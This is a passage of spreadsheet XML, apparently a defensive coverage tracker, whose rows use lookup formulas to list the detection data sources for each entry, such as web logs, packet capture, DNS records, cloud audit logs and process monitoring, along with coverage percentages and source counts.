        <f>LOOKUP(A495,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C495" s="17">
        <v>0</v>
      </c>
      <c r="D495" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E495" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="496" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A496" s="55" t="s">
        <v>2732</v>
      </c>
      <c r="B496" s="53" t="str">
        <f>LOOKUP(A496,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C496" s="17">
        <v>0</v>
      </c>
      <c r="D496" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E496" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="497" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A497" s="55" t="s">
        <v>2735</v>
      </c>
      <c r="B497" s="53" t="str">
        <f>LOOKUP(A497,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C497" s="17">
        <v>0</v>
      </c>
      <c r="D497" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E497" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="498" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A498" s="55" t="s">
        <v>2738</v>
      </c>
      <c r="B498" s="53" t="str">
        <f>LOOKUP(A498,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C498" s="17">
        <v>0</v>
      </c>
      <c r="D498" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E498" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="499" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A499" s="55" t="s">
        <v>2741</v>
      </c>
      <c r="B499" s="53" t="str">
        <f>LOOKUP(A499,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C499" s="17">
        <v>0</v>
      </c>
      <c r="D499" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E499" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="500" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A500" s="55" t="s">
        <v>2744</v>
      </c>
      <c r="B500" s="53" t="str">
        <f>LOOKUP(A500,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C500" s="17">
        <v>0</v>
      </c>
      <c r="D500" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E500" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="501" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A501" s="55" t="s">
        <v>2747</v>
      </c>
      <c r="B501" s="53" t="str">
        <f>LOOKUP(A501,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C501" s="17">
        <v>0</v>
      </c>
      <c r="D501" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E501" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="502" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A502" s="55" t="s">
        <v>2750</v>
      </c>
      <c r="B502" s="53" t="str">
        <f>LOOKUP(A502,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C502" s="17">
        <v>0</v>
      </c>
      <c r="D502" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E502" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="503" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A503" s="55" t="s">
        <v>2753</v>
      </c>
      <c r="B503" s="53" t="str">
        <f>LOOKUP(A503,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C503" s="17">
        <v>0</v>
      </c>
      <c r="D503" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E503" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="504" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A504" s="55" t="s">
        <v>2756</v>
      </c>
      <c r="B504" s="53" t="str">
        <f>LOOKUP(A504,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C504" s="17">
        <v>0</v>
      </c>
      <c r="D504" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E504" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="505" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A505" s="55" t="s">
        <v>2759</v>
      </c>
      <c r="B505" s="53" t="str">
        <f>LOOKUP(A505,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C505" s="17">
        <v>0</v>
      </c>
      <c r="D505" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E505" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="506" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A506" s="55" t="s">
        <v>2762</v>
      </c>
      <c r="B506" s="53" t="str">
        <f>LOOKUP(A506,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C506" s="17">
        <v>0</v>
      </c>
      <c r="D506" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E506" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="507" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A507" s="55" t="s">
        <v>2765</v>
      </c>
      <c r="B507" s="53" t="str">
        <f>LOOKUP(A507,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C507" s="17">
        <v>0</v>
      </c>
      <c r="D507" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E507" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="508" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A508" s="55" t="s">
        <v>2768</v>
      </c>
      <c r="B508" s="53" t="str">
        <f>LOOKUP(A508,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C508" s="17">
        <v>0</v>
      </c>
      <c r="D508" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E508" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="509" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A509" s="55" t="s">
        <v>2771</v>
      </c>
      <c r="B509" s="53" t="str">
        <f>LOOKUP(A509,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C509" s="17">
        <v>0</v>
      </c>
      <c r="D509" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E509" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="510" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A510" s="55" t="s">
        <v>2774</v>
      </c>
      <c r="B510" s="53" t="str">
        <f>LOOKUP(A510,'REF-DataSources'!A:C)</f>
        <v>Web logs</v>
      </c>
      <c r="C510" s="17">
        <v>100</v>
      </c>
      <c r="D510" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E510" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="511" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A511" s="53" t="s">
        <v>2779</v>
      </c>
      <c r="B511" s="53" t="str">
        <f>LOOKUP(A511,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs</v>
      </c>
      <c r="D511" s="53">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="E511" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="512" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A512" s="53" t="s">
        <v>2784</v>
      </c>
      <c r="B512" s="53" t="str">
        <f>LOOKUP(A512,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs</v>
      </c>
      <c r="D512" s="53">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="E512" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="513" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A513" s="53" t="s">
        <v>2788</v>
      </c>
      <c r="B513" s="53" t="str">
        <f>LOOKUP(A513,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D513" s="53">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E513" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="514" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A514" s="53" t="s">
        <v>2791</v>
      </c>
      <c r="B514" s="53" t="str">
        <f>LOOKUP(A514,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D514" s="53">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E514" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="515" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A515" s="53" t="s">
        <v>2794</v>
      </c>
      <c r="B515" s="53" t="str">
        <f>LOOKUP(A515,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D515" s="53">
        <f t="shared" ref="D515:D569" si="17">LEN(TRIM(B515))-LEN(SUBSTITUTE(TRIM(B515),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E515" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="516" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A516" s="53" t="s">
        <v>2797</v>
      </c>
      <c r="B516" s="53" t="str">
        <f>LOOKUP(A516,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D516" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E516" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="517" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A517" s="53" t="s">
        <v>2800</v>
      </c>
      <c r="B517" s="53" t="str">
        <f>LOOKUP(A517,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D517" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E517" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="518" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A518" s="53" t="s">
        <v>2802</v>
      </c>
      <c r="B518" s="53" t="str">
        <f>LOOKUP(A518,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D518" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E518" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="519" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A519" s="53" t="s">
        <v>2805</v>
      </c>
      <c r="B519" s="53" t="str">
        <f>LOOKUP(A519,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D519" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E519" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="520" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A520" s="53" t="s">
        <v>2808</v>
      </c>
      <c r="B520" s="53" t="str">
        <f>LOOKUP(A520,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D520" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E520" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="521" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A521" s="53" t="s">
        <v>2811</v>
      </c>
      <c r="B521" s="53" t="str">
        <f>LOOKUP(A521,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D521" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E521" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="522" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A522" s="53" t="s">
        <v>2814</v>
      </c>
      <c r="B522" s="53" t="str">
        <f>LOOKUP(A522,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D522" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E522" s="53">
        <f t="shared" ref="E522:E569" si="18">LEN(TRIM(C522))-LEN(SUBSTITUTE(TRIM(C522),";",""))+1</f>
        <v>1</v>
      </c>
    </row>
    <row r="523" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A523" s="53" t="s">
        <v>2817</v>
      </c>
      <c r="B523" s="53" t="str">
        <f>LOOKUP(A523,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D523" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E523" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="524" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A524" s="53" t="s">
        <v>2822</v>
      </c>
      <c r="B524" s="53" t="str">
        <f>LOOKUP(A524,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D524" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E524" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="525" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A525" s="53" t="s">
        <v>2826</v>
      </c>
      <c r="B525" s="53" t="str">
        <f>LOOKUP(A525,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D525" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E525" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="526" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A526" s="53" t="s">
        <v>2830</v>
      </c>
      <c r="B526" s="53" t="str">
        <f>LOOKUP(A526,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D526" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E526" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="527" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A527" s="53" t="s">
        <v>2833</v>
      </c>
      <c r="B527" s="53" t="str">
        <f>LOOKUP(A527,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D527" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E527" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="528" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A528" s="53" t="s">
        <v>2838</v>
      </c>
      <c r="B528" s="53" t="str">
        <f>LOOKUP(A528,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D528" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E528" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="529" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A529" s="53" t="s">
        <v>2842</v>
      </c>
      <c r="B529" s="53" t="str">
        <f>LOOKUP(A529,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D529" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E529" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="530" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A530" s="53" t="s">
        <v>2847</v>
      </c>
      <c r="B530" s="53" t="str">
        <f>LOOKUP(A530,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D530" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E530" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="531" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A531" s="53" t="s">
        <v>2851</v>
      </c>
      <c r="B531" s="53" t="str">
        <f>LOOKUP(A531,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D531" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E531" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="532" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A532" s="53" t="s">
        <v>2855</v>
      </c>
      <c r="B532" s="53" t="str">
        <f>LOOKUP(A532,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D532" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E532" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="533" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A533" s="53" t="s">
        <v>2860</v>
      </c>
      <c r="B533" s="53" t="str">
        <f>LOOKUP(A533,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D533" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E533" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="534" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A534" s="53" t="s">
        <v>2864</v>
      </c>
      <c r="B534" s="53" t="str">
        <f>LOOKUP(A534,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D534" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E534" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="535" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A535" s="53" t="s">
        <v>2869</v>
      </c>
      <c r="B535" s="53" t="str">
        <f>LOOKUP(A535,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D535" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E535" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="536" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A536" s="53" t="s">
        <v>2874</v>
      </c>
      <c r="B536" s="53" t="str">
        <f>LOOKUP(A536,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D536" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E536" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="537" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A537" s="53" t="s">
        <v>2878</v>
      </c>
      <c r="B537" s="53" t="str">
        <f>LOOKUP(A537,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D537" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E537" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="538" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A538" s="53" t="s">
        <v>2445</v>
      </c>
      <c r="B538" s="53" t="str">
        <f>LOOKUP(A538,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="D538" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E538" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="539" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A539" s="53" t="s">
        <v>2449</v>
      </c>
      <c r="B539" s="53" t="str">
        <f>LOOKUP(A539,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="D539" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E539" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="540" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A540" s="53" t="s">
        <v>2453</v>
      </c>
      <c r="B540" s="53" t="str">
        <f>LOOKUP(A540,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,DNS records</v>
      </c>
      <c r="D540" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E540" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="541" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A541" s="55" t="s">
        <v>2458</v>
      </c>
      <c r="B541" s="53" t="str">
        <f>LOOKUP(A541,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C541" s="17">
        <v>100</v>
      </c>
      <c r="D541" s="53">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="E541" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="542" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A542" s="53" t="s">
        <v>2463</v>
      </c>
      <c r="B542" s="53" t="str">
        <f>LOOKUP(A542,'REF-DataSources'!A:C)</f>
        <v>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</v>
      </c>
      <c r="D542" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E542" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="543" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A543" s="55" t="s">
        <v>2468</v>
      </c>
      <c r="B543" s="53" t="str">
        <f>LOOKUP(A543,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C543" s="17">
        <v>100</v>
      </c>
      <c r="D543" s="53">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="E543" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="544" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A544" s="53" t="s">
        <v>2472</v>
      </c>
      <c r="B544" s="53" t="str">
        <f>LOOKUP(A544,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D544" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E544" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="545" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A545" s="53" t="s">
        <v>2477</v>
      </c>
      <c r="B545" s="53" t="str">
        <f>LOOKUP(A545,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D545" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E545" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="546" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A546" s="53" t="s">
        <v>2481</v>
      </c>
      <c r="B546" s="53" t="str">
        <f>LOOKUP(A546,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D546" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E546" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="547" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A547" s="53" t="s">
        <v>2485</v>
      </c>
      <c r="B547" s="53" t="str">
        <f>LOOKUP(A547,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="D547" s="53">
        <f t="shared" si="17"/>
        <v>7</v>
      </c>
      <c r="E547" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="548" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A548" s="53" t="s">
        <v>2489</v>
      </c>
      <c r="B548" s="53" t="str">
        <f>LOOKUP(A548,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D548" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E548" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="549" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A549" s="53" t="s">
        <v>2494</v>
      </c>
      <c r="B549" s="53" t="str">
        <f>LOOKUP(A549,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D549" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E549" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="550" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A550" s="53" t="s">
        <v>2498</v>
      </c>
      <c r="B550" s="53" t="str">
        <f>LOOKUP(A550,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D550" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E550" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="551" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A551" s="53" t="s">
        <v>2503</v>
      </c>
      <c r="B551" s="53" t="str">
        <f>LOOKUP(A551,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D551" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E551" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="552" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A552" s="53" t="s">
        <v>2507</v>
      </c>
      <c r="B552" s="53" t="str">
        <f>LOOKUP(A552,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D552" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E552" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="553" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A553" s="53" t="s">
        <v>2511</v>
      </c>
      <c r="B553" s="53" t="str">
        <f>LOOKUP(A553,'REF-DataSources'!A:C)</f>
        <v>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</v>
      </c>
      <c r="D553" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E553" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="554" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A554" s="53" t="s">
        <v>2517</v>
      </c>
      <c r="B554" s="53" t="str">
        <f>LOOKUP(A554,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="D554" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E554" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="555" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A555" s="53" t="s">
        <v>2522</v>
      </c>
      <c r="B555" s="53" t="str">
        <f>LOOKUP(A555,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Process use of network</v>
      </c>
      <c r="D555" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E555" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
